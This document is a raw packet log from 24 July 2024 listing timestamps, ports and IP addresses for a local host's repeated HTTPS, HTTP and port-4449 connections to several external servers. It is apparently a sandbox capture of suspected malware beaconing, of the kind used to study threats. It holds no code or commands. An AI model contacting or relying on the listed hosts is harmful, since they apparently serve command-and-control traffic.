Jul 24, 2024 19:57:49.848634005 CEST	443	49809	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:49.958147049 CEST	49810	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:49.958190918 CEST	443	49810	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:49.958286047 CEST	49810	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:49.962162971 CEST	49810	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:49.962183952 CEST	443	49810	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:50.576080084 CEST	443	49810	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:50.576520920 CEST	49810	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:50.579502106 CEST	49810	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:50.579511881 CEST	443	49810	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:50.579967976 CEST	49810	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:50.579977036 CEST	443	49810	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:50.580043077 CEST	443	49810	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:50.580606937 CEST	49810	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:50.624500036 CEST	443	49810	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:51.926326036 CEST	443	49810	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:51.926405907 CEST	443	49810	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:51.926450014 CEST	49810	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:51.951016903 CEST	49810	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:51.951044083 CEST	443	49810	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:51.951082945 CEST	49810	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:51.951092005 CEST	443	49810	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:52.063946009 CEST	49811	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:52.063994884 CEST	443	49811	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:52.064078093 CEST	49811	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:52.064567089 CEST	49811	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:52.064577103 CEST	443	49811	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:52.685924053 CEST	443	49811	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:52.686039925 CEST	49811	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:52.688750982 CEST	49811	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:52.688764095 CEST	443	49811	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:52.688819885 CEST	49811	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:52.688823938 CEST	443	49811	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:52.688865900 CEST	49811	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:52.688868999 CEST	443	49811	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:52.689532995 CEST	443	49811	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:52.689750910 CEST	49811	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:52.736507893 CEST	443	49811	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:54.002125025 CEST	443	49811	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:54.002196074 CEST	443	49811	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:54.002248049 CEST	49811	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:54.020494938 CEST	49811	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:54.020522118 CEST	443	49811	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:54.020538092 CEST	49811	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:54.020545006 CEST	443	49811	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:54.127501011 CEST	49812	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:54.127545118 CEST	443	49812	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:54.128287077 CEST	49812	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:54.128287077 CEST	49812	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:54.128320932 CEST	443	49812	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:54.842387915 CEST	443	49812	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:54.842566967 CEST	49812	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:54.846322060 CEST	49812	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:54.846328974 CEST	443	49812	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:54.846426964 CEST	49812	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:54.846432924 CEST	443	49812	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:54.846573114 CEST	443	49812	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:54.846774101 CEST	49812	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:54.846781969 CEST	443	49812	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:55.753256083 CEST	443	49812	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:55.753376961 CEST	443	49812	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:55.753439903 CEST	49812	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:55.840898037 CEST	49812	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:55.840924025 CEST	443	49812	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:55.841015100 CEST	49812	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:55.841022015 CEST	443	49812	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:55.955703974 CEST	49813	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:55.955805063 CEST	443	49813	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:55.955918074 CEST	49813	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:55.959634066 CEST	49813	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:55.959692955 CEST	443	49813	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:56.606039047 CEST	443	49813	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:56.606149912 CEST	49813	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:56.608788967 CEST	49813	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:56.608802080 CEST	443	49813	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:56.608849049 CEST	49813	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:56.608853102 CEST	443	49813	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:56.608905077 CEST	49813	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:56.608907938 CEST	443	49813	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:56.609255075 CEST	443	49813	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:56.609370947 CEST	49813	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:56.652498007 CEST	443	49813	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:57.838110924 CEST	443	49813	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:57.838191032 CEST	443	49813	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:57.838272095 CEST	49813	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:57.855004072 CEST	49813	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:57.855050087 CEST	443	49813	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:57.855082989 CEST	49813	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:57.855101109 CEST	443	49813	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:57.969968081 CEST	49814	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:57.970015049 CEST	443	49814	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:57.970084906 CEST	49814	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:57.970599890 CEST	49814	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:57.970613003 CEST	443	49814	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:58.387813091 CEST	49815	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:57:58.393363953 CEST	80	49815	189.165.133.52	192.168.2.10
Jul 24, 2024 19:57:58.393547058 CEST	49815	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:57:58.393811941 CEST	49815	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:57:58.393811941 CEST	49815	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:57:58.398725986 CEST	80	49815	189.165.133.52	192.168.2.10
Jul 24, 2024 19:57:58.404525042 CEST	80	49815	189.165.133.52	192.168.2.10
Jul 24, 2024 19:57:58.577094078 CEST	443	49814	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:58.577181101 CEST	49814	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:58.579914093 CEST	49814	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:58.579924107 CEST	443	49814	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:58.580003023 CEST	49814	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:58.580008030 CEST	443	49814	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:58.580050945 CEST	49814	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:58.580054998 CEST	443	49814	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:58.580203056 CEST	443	49814	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:58.580346107 CEST	49814	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:58.620490074 CEST	443	49814	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:59.444520950 CEST	80	49815	189.165.133.52	192.168.2.10
Jul 24, 2024 19:57:59.446954966 CEST	80	49815	189.165.133.52	192.168.2.10
Jul 24, 2024 19:57:59.447020054 CEST	49815	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:57:59.554833889 CEST	49815	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:57:59.560285091 CEST	80	49815	189.165.133.52	192.168.2.10
Jul 24, 2024 19:57:59.917857885 CEST	443	49814	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:59.917933941 CEST	443	49814	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:59.923515081 CEST	49814	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:59.935080051 CEST	49814	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:59.935080051 CEST	49814	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:59.935098886 CEST	443	49814	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:59.935108900 CEST	443	49814	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:00.048516035 CEST	49816	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:00.048563957 CEST	443	49816	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:00.048616886 CEST	49816	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:00.049300909 CEST	49816	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:00.049309015 CEST	443	49816	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:00.800889015 CEST	443	49816	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:00.801220894 CEST	49816	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:00.803981066 CEST	49816	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:00.803993940 CEST	443	49816	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:00.804060936 CEST	49816	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:00.804065943 CEST	443	49816	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:00.804878950 CEST	443	49816	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:00.805069923 CEST	49816	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:00.852499962 CEST	443	49816	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:01.715881109 CEST	443	49816	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:01.715964079 CEST	443	49816	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:01.716114044 CEST	49816	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:01.733331919 CEST	49816	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:01.733331919 CEST	49816	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:01.733357906 CEST	443	49816	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:01.733371973 CEST	443	49816	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:01.845108986 CEST	49817	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:01.845170021 CEST	443	49817	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:01.845262051 CEST	49817	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:01.845881939 CEST	49817	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:01.845894098 CEST	443	49817	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:02.462707996 CEST	443	49817	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:02.462804079 CEST	49817	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:02.465467930 CEST	49817	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:02.465478897 CEST	443	49817	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:02.465531111 CEST	49817	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:02.465536118 CEST	443	49817	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:02.465600967 CEST	49817	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:02.465605021 CEST	443	49817	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:02.465733051 CEST	443	49817	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:02.465869904 CEST	49817	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:02.465882063 CEST	443	49817	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:03.716830015 CEST	443	49817	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:03.717004061 CEST	443	49817	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:03.717088938 CEST	49817	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:03.733431101 CEST	49817	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:03.733489037 CEST	443	49817	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:03.733521938 CEST	49817	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:03.733541965 CEST	443	49817	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:03.844958067 CEST	49818	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:03.845000029 CEST	443	49818	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:03.845060110 CEST	49818	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:03.845499039 CEST	49818	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:03.845510006 CEST	443	49818	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:04.475447893 CEST	443	49818	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:04.475539923 CEST	49818	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:04.478919029 CEST	49818	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:04.478929996 CEST	443	49818	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:04.479007006 CEST	49818	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:04.479012012 CEST	443	49818	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:04.479078054 CEST	49818	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:04.479083061 CEST	443	49818	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:04.479702950 CEST	443	49818	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:04.479908943 CEST	49818	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:04.524496078 CEST	443	49818	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:05.875560045 CEST	443	49818	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:05.875737906 CEST	443	49818	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:05.875797033 CEST	49818	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:05.892530918 CEST	49818	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:05.892553091 CEST	443	49818	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:05.892575979 CEST	49818	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:05.892582893 CEST	443	49818	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:06.001465082 CEST	49819	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:06.001518965 CEST	443	49819	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:06.001625061 CEST	49819	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:06.002083063 CEST	49819	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:06.002095938 CEST	443	49819	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:06.483509064 CEST	4449	49807	193.222.96.24	192.168.2.10
Jul 24, 2024 19:58:06.483594894 CEST	49807	4449	192.168.2.10	193.222.96.24
Jul 24, 2024 19:58:06.957648039 CEST	443	49819	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:06.957783937 CEST	49819	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:06.961155891 CEST	49819	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:06.961168051 CEST	443	49819	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:06.961271048 CEST	49819	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:06.961276054 CEST	443	49819	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:06.961587906 CEST	443	49819	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:06.961921930 CEST	49819	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:07.008500099 CEST	443	49819	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:07.994929075 CEST	443	49819	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:07.995037079 CEST	443	49819	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:07.995119095 CEST	49819	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:08.022883892 CEST	49819	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:08.022916079 CEST	443	49819	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:08.022964001 CEST	49819	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:08.022970915 CEST	443	49819	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:08.126355886 CEST	49820	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:08.126394987 CEST	443	49820	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:08.126472950 CEST	49820	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:08.127005100 CEST	49820	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:08.127017021 CEST	443	49820	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:08.740866899 CEST	443	49820	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:08.741031885 CEST	49820	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:08.748811007 CEST	49820	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:08.748842955 CEST	443	49820	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:08.748907089 CEST	49820	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:08.748920918 CEST	443	49820	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:08.749263048 CEST	443	49820	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:08.749469995 CEST	49820	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:08.792496920 CEST	443	49820	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:09.492269039 CEST	49807	4449	192.168.2.10	193.222.96.24
Jul 24, 2024 19:58:09.492630005 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:09.497735977 CEST	4449	49807	193.222.96.24	192.168.2.10
Jul 24, 2024 19:58:09.497776985 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:09.497885942 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:09.498254061 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:09.504110098 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:10.093966961 CEST	443	49820	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:10.094079971 CEST	443	49820	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:10.094186068 CEST	49820	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:10.159379005 CEST	49820	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:10.159427881 CEST	443	49820	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:10.159463882 CEST	49820	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:10.159482002 CEST	443	49820	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:10.268234015 CEST	49822	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:10.268337965 CEST	443	49822	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:10.268426895 CEST	49822	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:10.269161940 CEST	49822	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:10.269206047 CEST	443	49822	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:10.362035036 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:10.382914066 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:10.395667076 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:10.610857964 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:10.672521114 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:10.909795046 CEST	443	49822	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:10.909909964 CEST	49822	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:10.912595987 CEST	49822	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:10.912607908 CEST	443	49822	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:10.912658930 CEST	49822	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:10.912663937 CEST	443	49822	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:10.912837982 CEST	443	49822	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:10.912986040 CEST	49822	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:10.912995100 CEST	443	49822	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:12.151139975 CEST	443	49822	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:12.151213884 CEST	443	49822	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:12.151281118 CEST	49822	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:12.169617891 CEST	49822	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:12.169658899 CEST	443	49822	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:12.169677973 CEST	49822	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:12.169687986 CEST	443	49822	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:12.282700062 CEST	49824	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:12.282754898 CEST	443	49824	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:12.282833099 CEST	49824	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:12.283421040 CEST	49824	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:12.283438921 CEST	443	49824	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:12.748174906 CEST	49825	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:58:13.042871952 CEST	443	49824	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:13.042975903 CEST	49824	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:13.043957949 CEST	80	49825	189.165.133.52	192.168.2.10
Jul 24, 2024 19:58:13.044050932 CEST	49825	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:58:13.044200897 CEST	49825	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:58:13.044217110 CEST	49825	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:58:13.045687914 CEST	49824	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:13.045701981 CEST	443	49824	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:13.045748949 CEST	49824	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:13.045753956 CEST	443	49824	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:13.045803070 CEST	49824	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:13.045806885 CEST	443	49824	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:13.045959949 CEST	443	49824	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:13.046083927 CEST	49824	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:13.048976898 CEST	80	49825	189.165.133.52	192.168.2.10
Jul 24, 2024 19:58:13.048989058 CEST	80	49825	189.165.133.52	192.168.2.10
Jul 24, 2024 19:58:13.088496923 CEST	443	49824	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:14.024967909 CEST	443	49824	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:14.025063992 CEST	443	49824	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:14.025171995 CEST	49824	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:14.042500973 CEST	49824	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:14.042555094 CEST	443	49824	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:14.042577982 CEST	49824	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:58:14.042587042 CEST	443	49824	167.235.128.153	192.168.2.10
Jul 24, 2024 19:58:14.130640984 CEST	80	49825	189.165.133.52	192.168.2.10
Jul 24, 2024 19:58:14.131069899 CEST	80	49825	189.165.133.52	192.168.2.10
Jul 24, 2024 19:58:14.131151915 CEST	49825	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:58:14.131203890 CEST	49825	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:58:14.136193991 CEST	80	49825	189.165.133.52	192.168.2.10
Jul 24, 2024 19:58:14.157541990 CEST	49826	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:14.157607079 CEST	443	49826	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:14.157676935 CEST	49826	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:14.158349037 CEST	49826	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:14.158365965 CEST	443	49826	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:14.801173925 CEST	443	49826	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:14.801299095 CEST	49826	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:14.804284096 CEST	49826	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:14.804316044 CEST	443	49826	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:14.804387093 CEST	49826	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:14.804399014 CEST	443	49826	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:14.804651976 CEST	443	49826	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:14.804795980 CEST	49826	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:14.848541021 CEST	443	49826	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:15.808125019 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:15.813375950 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:15.813446045 CEST	49821	4449	192.168.2.10	94.156.79.190
Jul 24, 2024 19:58:15.821257114 CEST	4449	49821	94.156.79.190	192.168.2.10
Jul 24, 2024 19:58:16.092130899 CEST	443	49826	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:16.092212915 CEST	443	49826	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:16.092292070 CEST	49826	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:16.109232903 CEST	49826	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:16.109262943 CEST	443	49826	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:16.109283924 CEST	49826	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:58:16.109291077 CEST	443	49826	107.173.160.137	192.168.2.10
Jul 24, 2024 19:58:16.220462084 CEST	49827	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:16.220524073 CEST	443	49827	107.173.160.139	192.168.2.10
Jul 24, 2024 19:58:16.220611095 CEST	49827	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:58:16.221062899 CEST	49827	443	192.168.2.10	107.173.160.139
